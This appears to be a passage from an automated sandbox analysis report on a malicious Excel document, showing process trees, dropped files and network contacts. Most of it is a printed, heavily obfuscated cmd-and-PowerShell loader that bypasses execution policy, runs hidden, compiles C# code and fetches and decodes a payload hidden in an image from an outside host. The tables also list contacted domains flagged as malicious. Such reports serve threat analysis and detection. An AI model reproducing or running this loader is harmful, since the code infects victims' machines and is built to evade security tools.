'+'noitcnuf;)ZE5neliSZE5,ZE5oC'+'ZE5,ZE5yltZE5,ZE5euZE5,ZE5nitnZEXEc+XEc5'+' f- Rpi}1{}0XEc+XEc{}3{}2{}4'+'{Rpi( = }eCneIfQrEIfQFerpnoiIfQTCIfQARORRE{AwJ;}'+'ZE5ZE5 nioj- )}])}XAIfQm{AwJ mumix'+'aM- 0'+' muminiM- )ZE5moZE5,ZE5aR-teZE5,ZE5GZE5,ZE5dnZE5 f-Rpi}3{}0{}2{}1{Rpi(^&([}tSIIf'+'Ql{AwXEc+XEcJ{)++}i{AwJ ;}hTgIfQNeIfQL{AwJ tl- }IXEc+XEc{AwJ ;0 = }I{AwJ( rof(AwJ'+';H'+'TgNEl.}tSIIfQl{AwJ XEc+XEc= }XAIfQXEc+XEcM{AwJ)1 = }HTIfQGIfQNEL{AwJ]tni[,}XEc+'+'XEcTSIfQIl{AwJ( marap{ EeXEc+XEcIfQG noitcnufXEc(( ()XEcXEcNioJ-]2,11,3[emAn.)XEc*RDM*XEc ELbAiRAV(( .'( ( )'X'+]43[emOHSp$+]12[emOhSp$ ( ^& "; ^& ((GV '*mdr*').NAMe[3,11,2]-JoIn'')( (Ls variABlE:k4R5 ).vAlue[ -1 ..- ( (Ls variABlE:k4R5 ).vAlue.lEngTh )]-JOIn '' ) &&SeT TRS=PoWERShell -NOPRoFI -w 1 -EXEcuTiOnP BYPass -nOniNterAcTi sV s3zxl5 ( [typE]( \"{1}{0}{2}\" -f'ViRO','en','NmeNt') ) ; ( ( VARIaBle S3ZXl5 -Va )::(\"{1}{0}{3}{4}{2}\"-f 'V','geten','e','iRONmeNTv','ARIAbL' ).Invoke( 'uEO',( \"{2}{1}{0}\" -f 'S','ocES','pR' )) ) ^^^|. ( ${e`Nv:c`oM`sPEC}[4,26,25]-JOin'' )&& CMd /C %trs%" | C:\Windows\system32\cmd.exe | — | wmiprvse.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2252 | CMd.exe /C "set uEo=$k4r5 = " ))93]RahC[]GnIRtS[,)88]RahC[+96]RahC[+99]RahC[((EcalPER.)'))43]rAhc[,XEcRpiXEc ECalPERc-93]rAhc[,)09]rAhc[+96]rAhc[+35]rAhc[( ECaLpEr- 69]rAhc[,XEcIfQXEc'+'EC'+'alPERc- 63]rAhc'+'[,'+'XEcAwJXEcECalPERc-421]rAhc[,)65]rAhc[+701]rAhc[+601]rAhc[( ECalPERc-)XEc))]4394..XEc+XEc0[}o{AwJ(gniRTsTeG.8ftu::]gnidocnE.'+'txeT.metsyS[()ZE5mMZE5,ZE5uZE5f-XEc+XEc Rpi}XEc+XEc0{}1{RpXEc+XEci(.;)(raELc.}rOIfQRIfQXEc+XEcRE{'+'Aw'+'J;)ZE5jMZE5(.;}}))51XEc+XEc dnab- G.}P{AwJ(rob-'+')61*)51dnab-B.}P{AwJ((RoXEc+XEcolF::]htam[(=]}x{AwJ+064XEc+XEc*}_{AwJ[}o{AwJ;)}_{AwJ,}XEc+XEcx{AwJ(lEXiPXEc+XEctEg.}g{A'+'wJ=}P{AwJ{)XEc+XEc)954..0(ni XEc+XEc}X{AwJ(hcaerof{)ZE5%ZE5(.8kj)01..0(;0605 )ZE5etZE5,ZE5yBZEXEc+XEc5,ZE5][ZE5 fXEc+XEc- Rpi}0{}2{}1{Rpi( )ZE5aZE5(&=}oXEc+XEc{AXEc+XEcwJ;}{hctaC}})(Et'+'yBDAeR.}RW{AwJ]rahC[=+}SEIfQr{AwJ{)1(elXEc+XEcihWXEc+XEc{yrT;ZE5Z'+'E5=}seIfQr{AwJ;}tixe{hctaC}))}lRIfQu{AwJ(EkovNi.}XEc+XEcRo{AwJ.}Rw{AwJ()ZE5ySZXEc+XEcE5,ZEXEc+XEc5pamtiB.'+'ZE5,ZE5nZE5,ZE5iwarD.meXEc+XEcZE5,ZE5gZE5,ZE5tsZE5 f-'+' Rpi}4{}1{}3{}2{}'+'0{}5{Rpi( )XEc+XEcZE5aZE5XEc+XEc(&=}gXEc+XEc{AwJ{yrt;)'+'ZE5daeRnepZE5XEc+XEc,ZE5OZE5 f-Rpi}1{}0{R'+'pi(=}RXEc+XEcIfQO{AwJ;)}cW'+'{AwJ )ZE5aZE5(&(=}rw{AwJ;)ZE5jMZE5(.;)ZE5SZ'+'E5,ZE5tsyZEXEc+XEc5,ZE5XEc+XEcaZE5,ZE5gniwZE5XEc+XEc,ZE5rD.meZE5 f-Rpi}1{}2'+'{}0{}3XEc+XEc{}4{Rpi( emaNylbmessA- )ZE5'+'dAZE5,ZE5T-dZE5,ZE5epyZE5 f-Rpi}0{}1{}2{Rpi(.;)ZE5ejbO-'+'weZE5,ZE5NZE5,ZE5tcZE5f- Rpi}0XEc+XEc{}2{}1{Rpi( )ZE5aZE5( )ZE5asZE5,ZE'+'5lZE5f- RpiXEc+XEc}0{}1{RpXEc+X'+'Eci(.;)ZE5dZE5,ZE5miZE5,ZXEc+XEcE531/moc.xoZE5,ZE5bgZE5,ZE5mi//ZE5,ZE5/ZE5,ZE5_RW0Q9aZE5,ZE5u/ZE5,ZE5np.oZE5,ZE5aZE5,ZE56bZXEc+XEcE5,ZE5gZE5,ZE5.2segZE5,ZE5:spZE5 f-RpiXEc+XEc}2{}5{}7{}31{}6{}3{}8{}11{}01{}2XEc+XEc1{}'+'1{}4{}9{}'+'0{Rpi(+}OIfQr{AwJ+}Or{AwJ+RpihRpi=}LRIfQu{AwJ;)ZE5tneZE5,ZXEc'+'+XEcE5eW.teNZE5,ZE5iZXEc+XEcE5,ZE5lCbZE5f-Rpi}3{}1{}0{}2{Rpi(=}CW{AwJ;})ZE5ZE5 niXEc+XEcoJ-XEc+XEc }qD{AwJ( )ZE5IZE5,ZXEc+XEcE5xeZE5 f- RpXEc'+'+XEci}0XEc+XEc'+'{}1{Rpi(&;}))6XEc+XEc1,}_{AwJ(61tnIoT::]trevnoC.metsy'+'S[(]rahc[{)ZE5%ZE5(. 8kj)s'+'EiRtNeyTPmeevOMEr::]snoitpO'+'tilpS'+'gnirtS.metsyS[,Rpi8kjRpi(tILpSXEc+XEc.}IiIfQIS{AwJ = }QIfQXEc+XEcd{AwJ;}R'+'pi8kjRpi+))Rpi8kjRpXEc+XEci,2(TresnI.}QAIfQb{AwJ(=+}IIIfQIs{AwJ;}}qXEc+XEcAIfQB{AwJ+Rpi0RXEc+'+'XEcpi= }qAIfQb'+'XEc+XEc{AwJ{)4 tl- HtXEc+XEcGNeL.}qAIfQB{AwXEc+XEcJ(fi;)61,}EdIfQoXEc+XEccIIfQNU{AwJ('+'gnIrtsOt::]trevnoC.'+'metsyS[ = }qAI'+'fQXEc+XEcB{AwJ{)}FIfQb{Aw'+'J ni XEc+X'+'E'+'c}e'+'DOIfQCIfQiNu{AwJ(hcaerof;RpiRpi=}XEc+XEciIIIfQs'+'{AwJ;}}_{AwJ]rahc[]46tni[XEc+XEc{)ZE5%XEc+XEcZE5(. 8kj)(YarrAXEc+XEcRAhCO'+'T.}GG'+'IfQG{AwJ = }FIfQb{AwJ{)XEc+XEc}GgIXEc+XEcfQG{AwJ('+' UmIfQM noitcnuf;]1[))'+'(eA::]ae[(=}oR{AwJ;RXEc+XEcpi}};emaN.erutluCtnerruCXEc+XEc.ofnIerut'+'luC.noitazilabolXEc+XEcG.metsyS n'+'ruter{)(ea gnirts citats cilbup{ ae ssalc c'+'ilbup;metsyS gnisuRXEc+XEcpi fedepyt- )ZE5epZE5,ZE5ddAZE5,ZE5yT-ZE5 f- Rpi}2{}0{}1{Rpi(.;)ZE5jMZE5(.;}}7 s- )ZE5atSZE5,Z'+'E5-tZE5,ZE5rZE5,ZE5peelSZE5f-XEc+XEcRpi}0{}2{}1{}3{Rpi(&;)(ESNOPSErTeG.}yIfQr{AwJ = }AIfQr{AwJ;XEc+XEc)ZE5HZ'+'E5,ZE5DAEZE5 f- Rpi}0{}1{Rpi( = DOh'+'teM.}YXEc'+'+XEcIfQR{AwJ;)}XIfQz{AwXEc+XEcJ+)ZE5ptZE5,ZEXEc+XEc5thZE5,ZE5//:ZE5 f-Rpi}0{}2{}1{Rpi((ETAErC::XEc+XEc]'+'tseuqeRbeW.teN.metsy'+'S['+' = }YIfQr{XEc+XEcAwJ;)ZE5.ZE5,ZE5mocZE5XEc+XEc f- Rpi}0{}1{Rpi(+)4 )ZE5vZE5,ZE5v'+'aZE5 f'+'-XEc+XEcR'+'pi}1{}0{Rpi(.(XEc+X'+'Ec=}xZ{AwJ{ )++}i{AwJ ;1 tlXEc+XEc- XEc+XEc}I{AwJ XEc+XEc;0 =XEc+XEc }i{AwJ( rof{ jm noitcnuf;}}hTIfQGnEl{AwJ }la{AwJ )ZE5GZE5,ZE5EeZE5XEc+XE'+'cf'+'-Rpi}0{}1{Rpi(&;)Z'+'E5mlkjihgfedcbaZE5,ZE5xZEXEc+XEc5,ZE5zyZE5,ZE5srqpZE5,ZE5wv'+'utZE5,ZE5onZE5f- XEc+'+'XEcRpi}3{}4{}1{}2{}0{}5{Rpi( = }lIfQa{AwJ;)1 ='+' }HTg'+'NEIfQL{AwJ]tni[( marap{ vVIfQA '+'noitcnuf;)ZE5neliSZE5,ZE5oC'+'ZE5,ZE5yltZE5,ZE5euZE5,ZE5nitnZEXEc+XEc5'+' f- Rpi}1{}0XEc+XEc{}3{}2{}4'+'{Rpi( = }eCneIfQrEIfQFerpnoiIfQTCIfQARORRE{AwJ;}'+'ZE5ZE5 nioj- )}])}XAIfQm{AwJ mumix'+'aM- 0'+' muminiM- )ZE5moZE5,ZE5aR-teZE5,ZE5GZE5,ZE5dnZE5 f-Rpi}3{}0{}2{}1{Rpi(&([}tSIIf'+'Ql{AwXEc+XEcJ{)++}i{AwJ ;}hTgIfQNeIfQL{AwJ tl- }IXEc+XEc{AwJ ;0 = }I{AwJ( rof(AwJ'+';H'+'TgNEl.}tSIIfQl{AwJ XEc+XEc= }XAIfQXEc+XEcM{AwJ)1 = }HTIfQGIfQNEL{AwJ]tni[,}XEc+'+'XEcTSIfQIl{AwJ( marap{ EeXEc+XEcIfQG noitcnufXEc(( ()XEcXEcNioJ-]2,11,3[emAn.)XEc*RDM*XEc ELbAiRAV(( .'( ( )'X'+]43[emOHSp$+]12[emOhSp$ ( & "; ^& ((GV '*mdr*').NAMe[3,11,2]-JoIn'')( (Ls variABlE:k4R5 ).vAlue[ -1 ..- ( (Ls variABlE:k4R5 ).vAlue.lEngTh )]-JOIn '' ) &&SeT TRS=PoWERShell -NOPRoFI -w 1 -EXEcuTiOnP BYPass -nOniNterAcTi sV s3zxl5 ( [typE]( \"{1}{0}{2}\" -f'ViRO','en','NmeNt') ) ; ( ( VARIaBle S3ZXl5 -Va )::(\"{1}{0}{3}{4}{2}\"-f 'V','geten','e','iRONmeNTv','ARIAbL' ).Invoke( 'uEO',( \"{2}{1}{0}\" -f 'S','ocES','pR' )) ) ^^^|. ( ${e`Nv:c`oM`sPEC}[4,26,25]-JOin'' )&& CMd /C %trs%" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2508 | CMd /C %trs% | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2952 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVR68A.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3472 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6Z6P6DFVME4XUN2NIB13.temp | — | |
MD5:— | SHA256:— | |||
2848 | csc.exe | C:\Users\admin\AppData\Local\Temp\CSC6677.tmp | — | |
MD5:— | SHA256:— | |||
2848 | csc.exe | C:\Users\admin\AppData\Local\Temp\lcupnu2x.pdb | — | |
MD5:— | SHA256:— | |||
476 | cvtres.exe | C:\Users\admin\AppData\Local\Temp\RES6678.tmp | — | |
MD5:— | SHA256:— | |||
2848 | csc.exe | C:\Users\admin\AppData\Local\Temp\lcupnu2x.dll | — | |
MD5:— | SHA256:— | |||
2848 | csc.exe | C:\Users\admin\AppData\Local\Temp\lcupnu2x.out | — | |
MD5:— | SHA256:— | |||
2592 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\GXHUQU2947QA1VFUVTNG.temp | — | |
MD5:— | SHA256:— | |||
2196 | csc.exe | C:\Users\admin\AppData\Local\Temp\CSCBC77.tmp | — | |
MD5:— | SHA256:— | |||
2196 | csc.exe | C:\Users\admin\AppData\Local\Temp\hfg87rxe.pdb | — | |
MD5:— | SHA256:— |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3472 | powershell.exe | HEAD | 403 | 47.91.75.201:80 | http://kkrr.com/ | US | — | — | unknown |
3472 | powershell.exe | HEAD | 301 | 195.149.84.100:80 | http://uvda.com/ | GB | — | — | malicious |
2592 | powershell.exe | HEAD | 200 | 203.78.142.12:80 | http://nzav.com/ | HK | — | — | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3472 | powershell.exe | 47.91.75.201:80 | kkrr.com | Alibaba (China) Technology Co., Ltd. | US | unknown |
3472 | powershell.exe | 195.149.84.100:443 | uvda.com | World News PTE. LTD | GB | malicious |
3472 | powershell.exe | 195.149.84.100:80 | uvda.com | World News PTE. LTD | GB | malicious |
2592 | powershell.exe | 203.78.142.12:80 | nzav.com | LinkChina Telecom Global Limited. | HK | malicious |
Domain | IP | Reputation |
---|---|---|
kkrr.com |
| unknown |
uvda.com |
| malicious |
hztt.com |
| unknown |
nzav.com |
| unknown |
Process | Message |
---|---|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|